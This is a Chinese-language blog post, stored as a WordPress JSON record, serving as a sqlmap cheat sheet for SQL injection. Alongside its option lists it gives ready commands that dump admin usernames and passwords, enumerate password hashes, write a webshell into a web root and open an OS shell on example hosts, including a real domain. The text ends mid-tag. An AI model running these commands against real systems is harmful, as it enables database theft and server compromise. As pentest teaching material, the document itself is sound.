{"id":101,"date":"2021-07-07T09:27:53","date_gmt":"2021-07-07T01:27:53","guid":{"rendered":"http:\/\/daishen.ltd\/?p=101"},"modified":"2021-07-07T09:27:53","modified_gmt":"2021-07-07T01:27:53","slug":"sqlmap","status":"publish","type":"post","link":"https:\/\/daishen.ltd\/?p=101","title":{"rendered":"SQLMAP"},"content":{"rendered":"


\nSQLMAP<\/title><\/p>\n<h3 id=\"sqlmap\u7b80\u4ecb\">sqlmap\u7b80\u4ecb<\/h3>\n<p>sqlmap\u652f\u6301\u4e94\u79cd\u4e0d\u540c\u7684\u6ce8\u5165\u6a21\u5f0f\uff1a<\/p>\n<ul>\n<li>1\u3001\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5373\u53ef\u4ee5\u6839\u636e\u8fd4\u56de\u9875\u9762\u5224\u65ad\u6761\u4ef6\u771f\u5047\u7684\u6ce8\u5165\u3002<\/li>\n<li>2\u3001\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\uff0c\u5373\u4e0d\u80fd\u6839\u636e\u9875\u9762\u8fd4\u56de\u5185\u5bb9\u5224\u65ad\u4efb\u4f55\u4fe1\u606f\uff0c\u7528\u6761\u4ef6\u8bed\u53e5\u67e5\u770b\u65f6\u95f4\u5ef6\u8fdf\u8bed\u53e5\u662f\u5426\u6267\u884c\uff08\u5373\u9875\u9762\u8fd4\u56de\u65f6\u95f4\u662f\u5426\u589e\u52a0\uff09\u6765\u5224\u65ad\u3002<\/li>\n<li>3\u3001\u57fa\u4e8e\u62a5\u9519\u6ce8\u5165\uff0c\u5373\u9875\u9762\u4f1a\u8fd4\u56de\u9519\u8bef\u4fe1\u606f\uff0c\u6216\u8005\u628a\u6ce8\u5165\u7684\u8bed\u53e5\u7684\u7ed3\u679c\u76f4\u63a5\u8fd4\u56de\u5728\u9875\u9762\u4e2d\u3002<\/li>\n<li>4\u3001\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff0c\u53ef\u4ee5\u4f7f\u7528union\u7684\u60c5\u51b5\u4e0b\u7684\u6ce8\u5165\u3002<\/li>\n<li>5\u3001\u5806\u67e5\u8be2\u6ce8\u5165\uff0c\u53ef\u4ee5\u540c\u65f6\u6267\u884c\u591a\u6761\u8bed\u53e5\u7684\u6267\u884c\u65f6\u7684\u6ce8\u5165\u3002<\/li>\n<\/ul>\n<h3 id=\"sqlmap\u652f\u6301\u7684\u6570\u636e\u5e93\u6709\">sqlmap\u652f\u6301\u7684\u6570\u636e\u5e93\u6709<\/h3>\n<p>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase\u548cSAP MaxDB<\/p>\n<h2 id=\"\u68c0\u6d4b\u6ce8\u5165\">\u68c0\u6d4b\u6ce8\u5165<\/h2>\n<h3 id=\"\u57fa\u672c\u683c\u5f0f\">\u57fa\u672c\u683c\u5f0f<\/h3>\n<p>sqlmap -u \u201c<a href=\"http:\/\/www.vuln.cn\/post.php?id=1\" target=\"_blank\" class=\"url\" rel=\"noopener\">http:\/\/www.vuln.cn\/post.php?id=1<\/a>\u201d<\/p>\n<p>\u9ed8\u8ba4\u4f7f\u7528level1\u68c0\u6d4b\u5168\u90e8\u6570\u636e\u5e93\u7c7b\u578b<\/p>\n<p>sqlmap -u \u201c<a href=\"http:\/\/www.vuln.cn\/post.php?id=1\" target=\"_blank\" class=\"url\" rel=\"noopener\">http:\/\/www.vuln.cn\/post.php?id=1<\/a>\u201d \u2013dbms mysql \u2013level 3<\/p>\n<p>\u6307\u5b9a\u6570\u636e\u5e93\u7c7b\u578b\u4e3amysql\uff0c\u7ea7\u522b\u4e3a3\uff08\u51715\u7ea7\uff0c\u7ea7\u522b\u8d8a\u9ad8\uff0c\u68c0\u6d4b\u8d8a\u5168\u9762\uff09<\/p>\n<h3 id=\"\u8ddf\u968f302\u8df3\u8f6c\">\u8ddf\u968f302\u8df3\u8f6c<\/h3>\n<p>\u5f53\u6ce8\u5165\u9875\u9762\u9519\u8bef\u7684\u65f6\u5019\uff0c\u81ea\u52a8\u8df3\u8f6c\u5230\u53e6\u4e00\u4e2a\u9875\u9762\u7684\u65f6\u5019\u9700\u8981\u8ddf\u968f302\uff0c<br \/>\n\u5f53\u6ce8\u5165\u9519\u8bef\u7684\u65f6\u5019\uff0c\u5148\u62a5\u9519\u518d\u8df3\u8f6c\u7684\u65f6\u5019\uff0c\u4e0d\u9700\u8981\u8ddf\u968f302\u3002<br \/>\n\u76ee\u7684\u5c31\u662f\uff1a\u8981\u8ffd\u8e2a\u5230\u9519\u8bef\u4fe1\u606f\u3002<\/p>\n<h3 id=\"cookie\u6ce8\u5165\">cookie\u6ce8\u5165<\/h3>\n<p>\u5f53\u7a0b\u5e8f\u6709\u9632get\u6ce8\u5165\u7684\u65f6\u5019\uff0c\u53ef\u4ee5\u4f7f\u7528cookie\u6ce8\u5165<br \/>\nsqlmap -u \u201c<a href=\"http:\/\/www.baidu.com\/shownews.asp\" target=\"_blank\" class=\"url\" rel=\"noopener\">http:\/\/www.baidu.com\/shownews.asp<\/a>\u201d \u2013cookie \u201cid=11\u201d \u2013level 2\uff08\u53ea\u6709level\u8fbe\u52302\u624d\u4f1a\u68c0\u6d4bcookie\uff09<\/p>\n<h3 id=\"\u4ecepost\u6570\u636e\u5305\u4e2d\u6ce8\u5165\">\u4ecepost\u6570\u636e\u5305\u4e2d\u6ce8\u5165<\/h3>\n<p>\u53ef\u4ee5\u4f7f\u7528burpsuite\u6216\u8005temperdata\u7b49\u5de5\u5177\u6765\u6293\u53d6post\u5305<\/p>\n<p>sqlmap -r \u201cc:\\tools\\request.txt\u201d -p \u201cusername\u201d \u2013dbms mysql \u6307\u5b9ausername\u53c2\u6570<\/p>\n<h2 id=\"\u6ce8\u5165\u6210\u529f\u540e\">\u6ce8\u5165\u6210\u529f\u540e<\/h2>\n<h3 id=\"\u83b7\u53d6\u6570\u636e\u5e93\u57fa\u672c\u4fe1\u606f\">\u83b7\u53d6\u6570\u636e\u5e93\u57fa\u672c\u4fe1\u606f<\/h3>\n<p>sqlmap -u \u201c<a href=\"http:\/\/www.vuln.cn\/post.php?id=1\" target=\"_blank\" class=\"url\" rel=\"noopener\">http:\/\/www.vuln.cn\/post.php?id=1<\/a>\u201d \u2013dbms mysql \u2013level 3 \u2013dbs<\/p>\n<p>\u67e5\u8be2\u6709\u54ea\u4e9b\u6570\u636e\u5e93<\/p>\n<p>sqlmap -u \u201c<a href=\"http:\/\/www.vuln.cn\/post.php?id=1\" target=\"_blank\" class=\"url\" rel=\"noopener\">http:\/\/www.vuln.cn\/post.php?id=1<\/a>\u201d \u2013dbms mysql \u2013level 3 -D test \u2013tables<\/p>\n<p>\u67e5\u8be2test\u6570\u636e\u5e93\u4e2d\u6709\u54ea\u4e9b\u8868<\/p>\n<p>sqlmap -u \u201c<a href=\"http:\/\/www.vuln.cn\/post.php?id=1\" target=\"_blank\" class=\"url\" rel=\"noopener\">http:\/\/www.vuln.cn\/post.php?id=1<\/a>\u201d \u2013dbms mysql \u2013level 3 -D test -T admin \u2013columns<\/p>\n<p>\u67e5\u8be2test\u6570\u636e\u5e93\u4e2dadmin\u8868\u6709\u54ea\u4e9b\u5b57\u6bb5<\/p>\n<p>sqlmap -u \u201c<a href=\"http:\/\/www.vuln.cn\/post.php?id=1\" target=\"_blank\" class=\"url\" rel=\"noopener\">http:\/\/www.vuln.cn\/post.php?id=1<\/a>\u201d \u2013dbms mysql \u2013level 3 -D test -T admin -C \u201cusername,password\u201d \u2013dump<\/p>\n<p>dump\u51fa\u5b57\u6bb5username\u4e0epassword\u4e2d\u7684\u6570\u636e<\/p>\n<p>\u5176\u4ed6\u547d\u4ee4\u53c2\u8003\u4e0b\u9762<\/p>\n<h3 id=\"\u4ece\u6570\u636e\u5e93\u4e2d\u641c\u7d22\u5b57\u6bb5\">\u4ece\u6570\u636e\u5e93\u4e2d\u641c\u7d22\u5b57\u6bb5<\/h3>\n<p>sqlmap -r \u201cc:\\tools\\request.txt\u201d \u2013dbms mysql -D dedecms \u2013search -C admin,password<br \/>\n\u5728dedecms\u6570\u636e\u5e93\u4e2d\u641c\u7d22\u5b57\u6bb5admin\u6216\u8005password\u3002<\/p>\n<h3 id=\"\u8bfb\u53d6\u4e0e\u5199\u5165\u6587\u4ef6\">\u8bfb\u53d6\u4e0e\u5199\u5165\u6587\u4ef6<\/h3>\n<p>\u9996\u5148\u627e\u9700\u8981\u7f51\u7ad9\u7684\u7269\u7406\u8def\u5f84\uff0c\u5176\u6b21\u9700\u8981\u6709\u53ef\u5199\u6216\u53ef\u8bfb\u6743\u9650\u3002<\/p>\n<p>\u2013file-read=RFILE \u4ece\u540e\u7aef\u7684\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u6587\u4ef6\u7cfb\u7edf\u8bfb\u53d6\u6587\u4ef6 \uff08\u7269\u7406\u8def\u5f84\uff09<br \/>\n\u2013file-write=WFILE \u7f16\u8f91\u540e\u7aef\u7684\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u6587\u4ef6\u7cfb\u7edf\u4e0a\u7684\u672c\u5730\u6587\u4ef6 \uff08mssql xp_shell\uff09<br \/>\n\u2013file-dest=DFILE \u540e\u7aef\u7684\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u5199\u5165\u6587\u4ef6\u7684\u7edd\u5bf9\u8def\u5f84<br \/>\n#\u793a\u4f8b\uff1a<br \/>\nsqlmap -r \u201cc:\\request.txt\u201d -p id \u2013dbms mysql \u2013file-dest \u201ce:\\php\\htdocs\\dvwa\\inc\\include\\1.php\u201d \u2013file-write \u201cf:\\webshell\\1112.php\u201d<\/p>\n<p>\u4f7f\u7528shell\u547d\u4ee4\uff1a<\/p>\n<p>sqlmap -r \u201cc:\\tools\\request.txt\u201d -p id \u2013dms mysql \u2013os-shell<br \/>\n\u63a5\u4e0b\u6765\u6307\u5b9a\u7f51\u7ad9\u53ef\u5199\u76ee\u5f55\uff1a<br \/>\n\u201cE:\\php\\htdocs\\dvwa\u201d<\/p>\n<p>#\u6ce8\uff1amysql\u4e0d\u652f\u6301\u5217\u76ee\u5f55\uff0c\u4ec5\u652f\u6301\u8bfb\u53d6\u5355\u4e2a\u6587\u4ef6\u3002sqlserver\u53ef\u4ee5\u5217\u76ee\u5f55\uff0c\u4e0d\u80fd\u8bfb\u5199\u6587\u4ef6\uff0c\u4f46\u9700\u8981\u4e00\u4e2a\uff08xp_dirtree\u51fd\u6570\uff09<\/p>\n<h2 id=\"sqlmap\u8be6\u7ec6\u547d\u4ee4\">sqlmap\u8be6\u7ec6\u547d\u4ee4\uff1a<\/h2>\n<ul>\n<li>\u2013is-dba \u5f53\u524d\u7528\u6237\u6743\u9650\uff08\u662f\u5426\u4e3aroot\u6743\u9650\uff09<\/li>\n<li>\u2013dbs \u6240\u6709\u6570\u636e\u5e93<\/li>\n<li>\u2013current-db \u7f51\u7ad9\u5f53\u524d\u6570\u636e\u5e93<\/li>\n<li>\u2013users \u6240\u6709\u6570\u636e\u5e93\u7528\u6237<\/li>\n<li>\u2013current-user \u5f53\u524d\u6570\u636e\u5e93\u7528\u6237<\/li>\n<li>\u2013random-agent \u6784\u9020\u968f\u673auser-agent<\/li>\n<li>\u2013passwords \u6570\u636e\u5e93\u5bc6\u7801<\/li>\n<li>\u2013proxy <a href=\"http:\/\/local:8080\" target=\"_blank\" class=\"url\" rel=\"noopener\">http:\/\/local:8080<\/a> \u2013threads 10 (\u53ef\u4ee5\u81ea\u5b9a\u4e49\u7ebf\u7a0b\u52a0\u901f) \u4ee3\u7406<\/li>\n<li>\u2013time-sec=TIMESEC DBMS\u54cd\u5e94\u7684\u5ef6\u8fdf\u65f6\u95f4\uff08\u9ed8\u8ba4\u4e3a5\u79d2\uff09<\/li>\n<li>–dump \u83b7\u53d6\u8868\u4e2d\u7684\u6570\u636e\uff0c\u5305\u542b\u5217<\/li>\n<li>–dump-all \u8f6c\u5b58DBMS\u6570\u636e\u5e93\u6240\u6709\u8868\u9879\u76ee<\/li>\n<li>–level \u6d4b\u8bd5\u7b49\u7ea7(1-5)\uff0c \u9ed8\u8ba4\u4e3a1<\/li>\n<li>\u8bfb\u53d6\u6570\u636e—>\u8bfb\u53d6\u8868–\u8bfb\u53d6\u8868\u7684\u5217—>\u83b7\u53d6\u5185\u5bb9<\/li>\n<li>-D \u6307\u5b9a\u6570\u636e\u5e93<\/li>\n<li>-T \u6307\u5b9a\u8868<\/li>\n<li>-C \u6307\u5b9a\u5217<\/li>\n<li>–dbms=mysql oracle mssql \u6307\u5b9a\u6570\u636e\u5e93<\/li>\n<li>–privileges \u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u6743\u9650<\/li>\n<li>sqlmap.py -u “<a href=\"http:\/\/xx.com\/int.php?id=1\" target=\"_blank\" class=\"url\" rel=\"noopener\">http:\/\/xx.com\/int.php?id=1<\/a>” –schema –batch –exclude-sysdbs<\/li>\n<\/ul>\n<h3 id=\"\u6d4b\u8bd5\u7b49\u7ea7\">\u6d4b\u8bd5\u7b49\u7ea7<\/h3>\n<p>\u53c2\u6570: –level<br \/>\n\u5171\u6709\u4e94\u4e2a\u7b49\u7ea7\uff0c\u9ed8\u8ba4\u4e3a1\uff0csqImap\u4f7f\u7528\u7684payload\u53ef\u4ee5\u5728xml\/payloads.xml\u4e2d\u770b\u5230\uff0c\u4f60\u4e5f\u53ef\u4ee5\u6839\u636e\u76f8\u5e94\u7684\u683c\u5f0f\u6dfb\u52a0\u81ea\u5df1\u7684payload\u3002<br \/>\n\u8fd9\u4e2a\u53c2\u6570\u4e0d\u4ec5\u5f71\u54cd\u4f7f\u7528\u54ea\u4e9bpayload\u540c\u65f6\u4e5f\u4f1a\u5f71\u54cd\u6d4b\u8bd5\u7684\u6ce8\u5165\u70b9\uff0cGET\u548cPOST\u7684\u6570\u636e\u90fd\u4f1a\u6d4b\u8bd5\uff0cHTTP Cookie\u5728level\u4e3a2\u7684\u65f6\u5019\u5c31\u4f1a\u6d4b\u8bd5\uff0cHTTP User-Agent\/Referer\u5934\u5728level\u4e3a3\u7684\u65f6\u5019\u5c31\u4f1a\u6d4b\u8bd5\u3002<br \/>\n\u603b\u4e4b\u5728\u4f60\u4e0d\u786e\u5b9a\u54ea\u4e2apayload\u6216\u8005\u53c2\u6570\u4e3a\u6ce8\u5165\u70b9\u7684\u65f6\u5019\uff0c\u4e3a\u4e86\u4fdd\u8bc1\u5168\u9762\u6027\uff0c\u5efa\u8bae\u4f7f\u7528\u9ad8\u7684Ievel\u503c\u3002<\/p>\n<h3 id=\"\u663e\u793a\u8c03\u8bd5\u4fe1\u606f\">\u663e\u793a\u8c03\u8bd5\u4fe1\u606f<\/h3>\n<ul>\n<li>-V\u663e\u793a\u8c03\u8bd5\u4fe1\u606f\u67097\u4e2a\u7ea7\u522b<\/li>\n<li>0\u3001\u53ea\u663e\u793apython\u9519\u8bef\u4ee5\u53ca\u4e25\u91cd\u7684\u4fe1\u606f\u3002<\/li>\n<li>1\u3001\u540c\u65f6\u663e\u793a\u57fa\u672c\u4fe1\u606f\u548c\u8b66\u544a\u4fe1\u606f\u3002 (\u9ed8\u8ba4)<\/li>\n<li>2\u3001\u540c\u65f6\u663e\u793adebug\u4fe1\u606f\u3002<\/li>\n<li>3\u3001\u540c\u65f6\u663e\u793a\u6ce8\u5165\u7684payload\u3002<\/li>\n<li>4\u3001\u540c\u65f6\u663e\u793aHTTP\u8bf7\u6c42\u3002<\/li>\n<li>5\u3001\u540c\u65f6\u663e\u793aHTTP\u54cd\u5e94\u5934\u3002<\/li>\n<li>6\u3001\u540c\u65f6\u663e\u793aHTTP\u54cd\u5e94\u9875\u9762\u3002<\/li>\n<\/ul>\n<h3 id=\"options\u9009\u9879\uff09\">Options\uff08\u9009\u9879\uff09\uff1a<\/h3>\n<ul>\n<li>\u2013version \u663e\u793a\u7a0b\u5e8f\u7684\u7248\u672c\u53f7\u5e76\u9000\u51fa<\/li>\n<li>-h, \u2013help \u663e\u793a\u6b64\u5e2e\u52a9\u6d88\u606f\u5e76\u9000\u51fa<\/li>\n<li>-v VERBOSE \u8be6\u7ec6\u7ea7\u522b\uff1a0-6\uff08\u9ed8\u8ba4\u4e3a1\uff09<\/li>\n<li>–batch \u81ea\u52a8\u786e\u8ba4<\/li>\n<li>\u4fdd\u5b58\u8fdb\u5ea6\u7ee7\u7eed\u8dd1\uff1a<\/li>\n<\/ul>\n<p>sqlmap -u \u201c<a href=\"http:\/\/url\/news?id=1\" target=\"_blank\" class=\"url\" rel=\"noopener\">http:\/\/url\/news?id=1<\/a>\u201c \u2013dbs-o \u201csqlmap.log\u201d \u4fdd\u5b58\u8fdb\u5ea6<br \/>\nsqlmap -u \u201c<a href=\"http:\/\/url\/news?id=1\" target=\"_blank\" class=\"url\" rel=\"noopener\">http:\/\/url\/news?id=1<\/a>\u201c \u2013dbs-o \u201csqlmap.log\u201d \u2013resume \u6062\u590d\u5df2\u4fdd\u5b58\u8fdb\u5ea6<\/p>\n<h3 id=\"target\u76ee\u6807\uff09\">Target\uff08\u76ee\u6807\uff09\uff1a<\/h3>\n<p>\u4ee5\u4e0b\u81f3\u5c11\u9700\u8981\u8bbe\u7f6e\u5176\u4e2d\u4e00\u4e2a\u9009\u9879\uff0c\u8bbe\u7f6e\u76ee\u6807URL\u3002<\/p>\n<ul>\n<li>-d DIRECT \u76f4\u63a5\u8fde\u63a5\u5230\u6570\u636e\u5e93\u3002<\/li>\n<li>-u URL, \u2013url=URL \u76ee\u6807URL\u3002<\/li>\n<li>-m \u4ece\u6587\u672c\u4e2d\u83b7\u53d6\u591a\u4e2a\u76ee\u6807<\/li>\n<li>-l LIST \u4eceBurp\u6216WebScarab\u4ee3\u7406\u7684\u65e5\u5fd7\u4e2d\u89e3\u6790\u76ee\u6807\u3002<\/li>\n<li>-r REQUESTFILE \uff0csqImap\u53ef\u4ee5\u4ece\u4e00\u4e2a\u6587\u672c\u6587\u4ef6\u4e2d\u83b7\u53d6HTTP\u8bf7\u6c42\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u8df3\u8fc7\u8bbe\u7f6e\u4e00\u4e9b\u5176\u4ed6\u53c2\u6570(\u6bd4\u5982cookie, POST\u6570\u636e\uff0c \u7b49\u7b49)<\/li>\n<li>-g GOOGLEDORK \u5904\u7406Google dork\u7684\u7ed3\u679c\u4f5c\u4e3a\u76ee\u6807URL\u3002<\/li>\n<li>-c CONFIGFILE \u4eceINI\u914d\u7f6e\u6587\u4ef6\u4e2d\u52a0\u8f7d\u9009\u9879\u3002<\/li>\n<\/ul>\n<h3 id=\"request\u8bf7\u6c42\uff09\">Request\uff08\u8bf7\u6c42\uff09\uff1a<\/h3>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u7528\u6765\u6307\u5b9a\u5982\u4f55\u8fde\u63a5\u5230\u76ee\u6807URL\u3002<\/p>\n<ul>\n<li>\u2013data=DATA \u901a\u8fc7POST\u53d1\u9001\u7684\u6570\u636e\u5b57\u7b26\u4e32<\/li>\n<li>-param-del \u53c2\u6570\u62c6\u5206\u5b57\u7b26\uff0c\u5f53GET\u6216POST\u7684\u6570\u636e\u9700\u8981\u7528\u5176\u4ed6\u5b57\u7b26\u5206\u5272\u6d4b\u8bd5\u53c2\u6570\u7684\u65f6\u5019\u9700\u8981\u7528\u5230\u6b64\u53c2\u6570\u3002<\/li>\n<li>\u2013cookie=COOKIE HTTP Cookie\u5934<\/li>\n<li>\u2013cookie-urlencode URL \u7f16\u7801\u751f\u6210\u7684cookie\u6ce8\u5165<\/li>\n<li>\u2013drop-set-cookie \u5ffd\u7565\u54cd\u5e94\u7684Set \u2013 Cookie\u5934\u4fe1\u606f<\/li>\n<li>\u2013user-agent=AGENT \u6307\u5b9a HTTP User \u2013 Agent\u5934<\/li>\n<li>\u2013random-agent \u4f7f\u7528\u968f\u673a\u9009\u5b9a\u7684HTTP User \u2013 Agent\u5934<\/li>\n<li>\u2013referer=REFERER \u6307\u5b9a HTTP Referer\u5934 level3<\/li>\n<li>\u2013headers=HEADERS \u6362\u884c\u5206\u5f00\uff0c\u52a0\u5165\u5176\u4ed6\u7684HTTP\u5934<\/li>\n<li>\u2013auth-type=ATYPE HTTP\u8eab\u4efd\u9a8c\u8bc1\u7c7b\u578b\uff08\u57fa\u672c\uff0c\u6458\u8981\u6216NTLM\uff09(Basic, Digest or NTLM)<\/li>\n<li>\u2013auth-cred=ACRED HTTP\u8eab\u4efd\u9a8c\u8bc1\u51ed\u636e\uff08\u7528\u6237\u540d:\u5bc6\u7801\uff09<\/li>\n<li>\u2013auth-cert=ACERT HTTP\u8ba4\u8bc1\u8bc1\u4e66\uff08key_file\uff0ccert_file\uff09<\/li>\n<li>\u2013proxy=PROXY \u4f7f\u7528HTTP\u4ee3\u7406\u8fde\u63a5\u5230\u76ee\u6807URL<\/li>\n<li>\u2013proxy-cred=PCRED HTTP\u4ee3\u7406\u8eab\u4efd\u9a8c\u8bc1\u51ed\u636e\uff08\u7528\u6237\u540d\uff1a\u5bc6\u7801\uff09<\/li>\n<li>\u2013ignore-proxy \u5ffd\u7565\u7cfb\u7edf\u9ed8\u8ba4\u7684HTTP\u4ee3\u7406<\/li>\n<li>\u2013delay=DELAY \u5728\u6bcf\u4e2aHTTP\u8bf7\u6c42\u4e4b\u95f4\u7684\u5ef6\u8fdf\u65f6\u95f4\uff0c\u5355\u4f4d\u4e3a\u79d2<\/li>\n<li>\u2013timeout=TIMEOUT \u7b49\u5f85\u8fde\u63a5\u8d85\u65f6\u7684\u65f6\u95f4\uff08\u9ed8\u8ba4\u4e3a30\u79d2\uff09<\/li>\n<li>\u2013retries=RETRIES \u8fde\u63a5\u8d85\u65f6\u540e\u91cd\u65b0\u8fde\u63a5\u7684\u65f6\u95f4\uff08\u9ed8\u8ba43\uff09<\/li>\n<li>\u2013scope=SCOPE \u4ece\u6240\u63d0\u4f9b\u7684\u4ee3\u7406\u65e5\u5fd7\u4e2d\u8fc7\u6ee4\u5668\u76ee\u6807\u7684\u6b63\u5219\u8868\u8fbe\u5f0f<\/li>\n<li>\u2013safe-url=SAFURL \u5728\u6d4b\u8bd5\u8fc7\u7a0b\u4e2d\u7ecf\u5e38\u8bbf\u95ee\u7684url\u5730\u5740<\/li>\n<li>\u2013safe-freq=SAFREQ \u4e24\u6b21\u8bbf\u95ee\u4e4b\u95f4\u6d4b\u8bd5\u8bf7\u6c42\uff0c\u7ed9\u51fa\u5b89\u5168\u7684URL<\/li>\n<\/ul>\n<h3 id=\"enumeration\u679a\u4e3e\uff09\">Enumeration\uff08\u679a\u4e3e\uff09\uff1a<\/h3>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u7528\u6765\u5217\u4e3e\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u4fe1\u606f\u3001\u8868\u4e2d\u7684\u7ed3\u6784\u548c\u6570\u636e\u3002\u6b64\u5916\uff0c\u60a8\u8fd8\u53ef\u4ee5\u8fd0\u884c<br \/>\n\u60a8\u81ea\u5df1\u7684SQL\u8bed\u53e5\u3002<\/p>\n<ul>\n<li>-b, \u2013banner \u68c0\u7d22\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u6807\u8bc6<\/li>\n<li>\u2013current-user \u68c0\u7d22\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u5f53\u524d\u7528\u6237<\/li>\n<li>\u2013current-db \u68c0\u7d22\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u5f53\u524d\u6570\u636e\u5e93<\/li>\n<li>\u2013is-dba \u68c0\u6d4bDBMS\u5f53\u524d\u7528\u6237\u662f\u5426DBA<\/li>\n<li>\u2013users \u679a\u4e3e\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7528\u6237<\/li>\n<li>\u2013passwords \u679a\u4e3e\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7528\u6237\u5bc6\u7801\u54c8\u5e0c<\/li>\n<li>\u2013privileges \u679a\u4e3e\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7528\u6237\u7684\u6743\u9650<\/li>\n<li>\u2013roles \u679a\u4e3e\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7528\u6237\u7684\u89d2\u8272<\/li>\n<li>\u2013dbs \u679a\u4e3e\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u6570\u636e\u5e93<\/li>\n<li>-D DBname \u8981\u8fdb\u884c\u679a\u4e3e\u7684\u6307\u5b9a\u6570\u636e\u5e93\u540d<\/li>\n<li>-T TBLname \u8981\u8fdb\u884c\u679a\u4e3e\u7684\u6307\u5b9a\u6570\u636e\u5e93\u8868\uff08\u5982\uff1a-T tablename \u2013columns\uff09<\/li>\n<li>\u2013tables \u679a\u4e3e\u7684DBMS\u6570\u636e\u5e93\u4e2d\u7684\u8868<\/li>\n<li>\u2013columns \u679a\u4e3eDBMS\u6570\u636e\u5e93\u8868\u5217<\/li>\n<li>\u2013dump \u8f6c\u50a8\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u6570\u636e\u5e93\u4e2d\u7684\u8868\u9879<\/li>\n<li>\u2013dump-all \u8f6c\u50a8\u6240\u6709\u7684DBMS\u6570\u636e\u5e93\u8868\u4e2d\u7684\u6761\u76ee<\/li>\n<li>\u2013search \u641c\u7d22\u5217\uff08S\uff09\uff0c\u8868\uff08S\uff09\u548c\/\u6216\u6570\u636e\u5e93\u540d\u79f0\uff08S\uff09<\/li>\n<li>-C COL \u8981\u8fdb\u884c\u679a\u4e3e\u7684\u6570\u636e\u5e93\u5217<\/li>\n<li>-U USER \u7528\u6765\u8fdb\u884c\u679a\u4e3e\u7684\u6570\u636e\u5e93\u7528\u6237<\/li>\n<li>\u2013exclude-sysdbs \u679a\u4e3e\u8868\u65f6\u6392\u9664\u7cfb\u7edf\u6570\u636e\u5e93<\/li>\n<li>\u2013start=LIMITSTART \u7b2c\u4e00\u4e2a\u67e5\u8be2\u8f93\u51fa\u8fdb\u5165\u68c0\u7d22<\/li>\n<li>\u2013stop=LIMITSTOP \u6700\u540e\u67e5\u8be2\u7684\u8f93\u51fa\u8fdb\u5165\u68c0\u7d22<\/li>\n<li>\u2013first=FIRSTCHAR \u7b2c\u4e00\u4e2a\u67e5\u8be2\u8f93\u51fa\u5b57\u7684\u5b57\u7b26\u68c0\u7d22<\/li>\n<li>\u2013last=LASTCHAR \u6700\u540e\u67e5\u8be2\u7684\u8f93\u51fa\u5b57\u5b57\u7b26\u68c0\u7d22<\/li>\n<li>\u2013sql-query=QUERY \u8981\u6267\u884c\u7684SQL\u8bed\u53e5<\/li>\n<li>\u2013sql-shell \u63d0\u793a\u4ea4\u4e92\u5f0fSQL\u7684shell<\/li>\n<\/ul>\n<h3 id=\"optimization\u4f18\u5316\uff09\">Optimization\uff08\u4f18\u5316\uff09\uff1a<\/h3>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u7528\u4e8e\u4f18\u5316SqlMap\u7684\u6027\u80fd\u3002<\/p>\n<ul>\n<li>-o \u5f00\u542f\u6240\u6709\u4f18\u5316\u5f00\u5173<\/li>\n<li>\u2013predict-output \u9884\u6d4b\u5e38\u89c1\u7684\u67e5\u8be2\u8f93\u51fa<\/li>\n<li>\u2013keep-alive \u4f7f\u7528\u6301\u4e45\u7684HTTP\uff08S\uff09\u8fde\u63a5<\/li>\n<li>\u2013null-connection \u4ece\u6ca1\u6709\u5b9e\u9645\u7684HTTP\u54cd\u5e94\u4f53\u4e2d\u68c0\u7d22\u9875\u9762\u957f\u5ea6<\/li>\n<li>\u2013threads=THREADS \u6700\u5927\u7684HTTP\uff08S\uff09\u8bf7\u6c42\u5e76\u53d1\u91cf\uff08\u9ed8\u8ba4\u4e3a1\uff09<\/li>\n<\/ul>\n<h3 id=\"injection\u6ce8\u5165\uff09\">Injection\uff08\u6ce8\u5165\uff09\uff1a<\/h3>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u7528\u6765\u6307\u5b9a\u6d4b\u8bd5\u54ea\u4e9b\u53c2\u6570\uff0c \u63d0\u4f9b\u81ea\u5b9a\u4e49\u7684\u6ce8\u5165payloads\u548c\u53ef\u9009\u7be1\u6539\u811a\u672c\u3002<\/p>\n<ul>\n<li>-p TESTPARAMETER \u53ef\u6d4b\u8bd5\u7684\u53c2\u6570\uff08S\uff09<\/li>\n<li>\u2013dbms=DBMS \u5f3a\u5236\u540e\u7aef\u7684DBMS\u4e3a\u6b64\u503c<\/li>\n<li>\u2013os=OS \u5f3a\u5236\u540e\u7aef\u7684DBMS\u64cd\u4f5c\u7cfb\u7edf\u4e3a\u8fd9\u4e2a\u503c<\/li>\n<li>\u2013prefix=PREFIX \u6ce8\u5165payload\u5b57\u7b26\u4e32\u524d\u7f00<\/li>\n<li>\u2013suffix=SUFFIX \u6ce8\u5165payload\u5b57\u7b26\u4e32\u540e\u7f00<\/li>\n<li>\u2013tamper=TAMPER \u4f7f\u7528\u7ed9\u5b9a\u7684\u811a\u672c\uff08S\uff09\u7be1\u6539\u6ce8\u5165\u6570\u636e<\/li>\n<\/ul>\n<h3 